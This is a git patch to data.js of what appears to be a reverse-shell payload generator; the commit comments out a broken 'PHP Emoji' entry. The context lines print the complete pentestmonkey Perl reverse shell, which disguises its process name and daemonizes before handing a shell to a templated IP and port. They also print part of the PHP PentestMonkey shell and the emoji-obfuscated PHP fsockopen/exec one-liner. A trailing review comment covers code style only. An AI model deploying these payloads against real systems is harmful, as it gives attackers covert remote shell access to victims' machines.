From 1e305ca8a9ec50cb4df0e98c28851bafadd35a75 Mon Sep 17 00:00:00 2001
From: Ryan Montgomery <44453666+0dayCTF@users.noreply.github.com>
Date: Thu, 19 Jan 2023 15:33:57 -0500
Subject: [PATCH] Update data.js

Commented out PHP Emoji, currently broken.
---
 js/data.js | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/js/data.js b/js/data.js
index 5978b4c..64ded9d 100644
--- a/js/data.js
+++ b/js/data.js
@@ -130,11 +130,11 @@ const reverseShellCommands = withCommandType( "command": `#!/usr/bin/perl -w\n# perl-reverse-shell - A Reverse Shell implementation in PERL\n# Copyright (C) 2006 pentestmonkey@pentestmonkey.net\n#\n# This tool may be used for legal purposes only. Users take full responsibility\n# for any actions performed using this tool. The author accepts no liability\n# for damage caused by this tool. If these terms are not acceptable to you, then\n# do not use this tool.\n#\n# In all other respects the GPL version 2 applies:\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n# This tool may be used for legal purposes only. Users take full responsibility\n# for any actions performed using this tool. If these terms are not acceptable to\n# you, then do not use this tool.\n#\n# You are encouraged to send comments, improvements or suggestions to\n# me at pentestmonkey@pentestmonkey.net\n#\n# Description\n# -----------\n# This script will make an outbound TCP connection to a hardcoded IP and port.\n# The recipient will be given a shell running as the current user (apache normally).\n#\n\nuse strict;\nuse Socket;\nuse FileHandle;\nuse POSIX;\nmy $VERSION = "1.0";\n\n# Where to send the reverse shell. 
Change these.\nmy $ip = '{ip}';\nmy $port = {port};\n\n# Options\nmy $daemon = 1;\nmy $auth = 0; # 0 means authentication is disabled and any \n # source IP can access the reverse shell\nmy $authorised_client_pattern = qr(^127\\.0\\.0\\.1$);\n\n# Declarations\nmy $global_page = "";\nmy $fake_process_name = "/usr/sbin/apache";\n\n# Change the process name to be less conspicious\n$0 = "[httpd]";\n\n# Authenticate based on source IP address if required\nif (defined($ENV{'REMOTE_ADDR'})) {\n cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");\n\n if ($auth) {\n unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {\n cgiprint("ERROR: Your client isn't authorised to view this page");\n cgiexit();\n }\n }\n} elsif ($auth) {\n cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");\n cgiexit(0);\n}\n\n# Background and dissociate from parent process if required\nif ($daemon) {\n my $pid = fork();\n if ($pid) {\n cgiexit(0); # parent exits\n }\n\n setsid();\n chdir('/');\n umask(0);\n}\n\n# Make TCP connection for reverse shell\nsocket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));\nif (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {\n cgiprint("Sent reverse shell to $ip:$port");\n cgiprintpage();\n} else {\n cgiprint("Couldn't open reverse shell to $ip:$port: $!");\n cgiexit(); \n}\n\n# Redirect STDIN, STDOUT and STDERR to the TCP connection\nopen(STDIN, ">&SOCK");\nopen(STDOUT,">&SOCK");\nopen(STDERR,">&SOCK");\n$ENV{'HISTFILE'} = '/dev/null';\nsystem("w;uname -a;id;pwd");\nexec({"{shell}"} ($fake_process_name, "-i"));\n\n# Wrapper around print\nsub cgiprint {\n my $line = shift;\n $line .= "

\\n";\n $global_page .= $line;\n}\n\n# Wrapper around exit\nsub cgiexit {\n cgiprintpage();\n exit 0; # 0 to ensure we don't give a 500 response.\n}\n\n# Form HTTP response using all the messages gathered by cgiprint so far\nsub cgiprintpage {\n print "Content-Length: " . length($global_page) . "\\r\nConnection: close\\r\nContent-Type: text\\/html\\r\\n\\r\\n" . $global_page;\n}\n`, "meta": ["linux", "mac"] }, - { - "name": "PHP Emoji", - "command": "php -r '$๐Ÿ˜€=\"1\";$๐Ÿ˜=\"2\";$๐Ÿ˜…=\"3\";$๐Ÿ˜†=\"4\";$๐Ÿ˜‰=\"5\";$๐Ÿ˜Š=\"6\";$๐Ÿ˜Ž=\"7\";$๐Ÿ˜=\"8\";$๐Ÿ˜š=\"9\";$๐Ÿ™‚=\"0\";$๐Ÿคข=\" \";$๐Ÿค“=\"<\";$๐Ÿค =\">\";$๐Ÿ˜ฑ=\"-\";$๐Ÿ˜ต=\"&\";$๐Ÿคฉ=\"i\";$๐Ÿค”=\".\";$๐Ÿคจ=\"/\";$๐Ÿฅฐ=\"a\";$๐Ÿ˜=\"b\";$๐Ÿ˜ถ=\"i\";$๐Ÿ™„=\"h\";$๐Ÿ˜‚=\"c\";$๐Ÿคฃ=\"d\";$๐Ÿ˜ƒ=\"e\";$๐Ÿ˜„=\"f\";$๐Ÿ˜‹=\"k\";$๐Ÿ˜˜=\"n\";$๐Ÿ˜—=\"o\";$๐Ÿ˜™=\"p\";$๐Ÿค—=\"s\";$๐Ÿ˜‘=\"x\";$๐Ÿ’€ = $๐Ÿ˜„. $๐Ÿค—. $๐Ÿ˜—. $๐Ÿ˜‚. $๐Ÿ˜‹. $๐Ÿ˜—. $๐Ÿ˜™. $๐Ÿ˜ƒ. $๐Ÿ˜˜;$๐Ÿš€ = \"{ip}\";$๐Ÿ’ป = {port};$๐Ÿš = \"{shell}\". $๐Ÿคข. $๐Ÿ˜ฑ. $๐Ÿคฉ. $๐Ÿคข. $๐Ÿค“. $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿ˜. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…;$๐Ÿคฃ = $๐Ÿ’€($๐Ÿš€,$๐Ÿ’ป);$๐Ÿ‘ฝ = $๐Ÿ˜ƒ. $๐Ÿ˜‘. $๐Ÿ˜ƒ. $๐Ÿ˜‚;$๐Ÿ‘ฝ($๐Ÿš);'", - "meta": ["linux", "mac"] - }, +// { +// "name": "PHP Emoji", +// "command": "php -r '$๐Ÿ˜€=\"1\";$๐Ÿ˜=\"2\";$๐Ÿ˜…=\"3\";$๐Ÿ˜†=\"4\";$๐Ÿ˜‰=\"5\";$๐Ÿ˜Š=\"6\";$๐Ÿ˜Ž=\"7\";$๐Ÿ˜=\"8\";$๐Ÿ˜š=\"9\";$๐Ÿ™‚=\"0\";$๐Ÿคข=\" \";$๐Ÿค“=\"<\";$๐Ÿค =\">\";$๐Ÿ˜ฑ=\"-\";$๐Ÿ˜ต=\"&\";$๐Ÿคฉ=\"i\";$๐Ÿค”=\".\";$๐Ÿคจ=\"/\";$๐Ÿฅฐ=\"a\";$๐Ÿ˜=\"b\";$๐Ÿ˜ถ=\"i\";$๐Ÿ™„=\"h\";$๐Ÿ˜‚=\"c\";$๐Ÿคฃ=\"d\";$๐Ÿ˜ƒ=\"e\";$๐Ÿ˜„=\"f\";$๐Ÿ˜‹=\"k\";$๐Ÿ˜˜=\"n\";$๐Ÿ˜—=\"o\";$๐Ÿ˜™=\"p\";$๐Ÿค—=\"s\";$๐Ÿ˜‘=\"x\";$๐Ÿ’€ = $๐Ÿ˜„. $๐Ÿค—. $๐Ÿ˜—. $๐Ÿ˜‚. $๐Ÿ˜‹. $๐Ÿ˜—. $๐Ÿ˜™. $๐Ÿ˜ƒ. $๐Ÿ˜˜;$๐Ÿš€ = \"{ip}\";$๐Ÿ’ป = {port};$๐Ÿš = \"{shell}\". $๐Ÿคข. $๐Ÿ˜ฑ. $๐Ÿคฉ. $๐Ÿคข. $๐Ÿค“. $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿ˜. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…;$๐Ÿคฃ = $๐Ÿ’€($๐Ÿš€,$๐Ÿ’ป);$๐Ÿ‘ฝ = $๐Ÿ˜ƒ. $๐Ÿ˜‘. $๐Ÿ˜ƒ. 
$๐Ÿ˜‚;$๐Ÿ‘ฝ($๐Ÿš);'", +// "meta": ["linux", "mac"] +// }, { "name": "PHP PentestMonkey", "command": " array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\tif (feof($sock)) {\n\t\tprintit(\"ERROR: Shell connection terminated\");\n\t\tbreak;\n\t}\n\n\tif (feof($pipes[1])) {\n\t\tprintit(\"ERROR: Shell process terminated\");\n\t\tbreak;\n\t}\n\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit(\"SOCK READ\");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit(\"SOCK: $input\");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit(\"STDOUT READ\");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit(\"STDOUT: $input\");\n\t\tfwrite($sock, $input);\n\t}\n\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit(\"STDERR READ\");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit(\"STDERR: $input\");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint \"$string\\n\";\n\t}\n}\n\n?>",
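Review bot: The five new `//` lines leave the PHP Emoji entry in the array as commented-out code with no in-file reason, so the only record that it was disabled because the payload is broken is the commit message. Prefer deleting the entry outright (git history keeps the original text) or, if it is meant to be restored later, prefix the block with `// Disabled: PHP Emoji command is currently broken` so a maintainer knows why it is skipped and when it is safe to re-enable. Either form leaves the neighbouring entries intact, since the commented lines sit between the `},` of the Perl entry and the `{` of the PHP PentestMonkey entry. The enclosing `reverseShellCommands` array literal begins and ends outside this hunk.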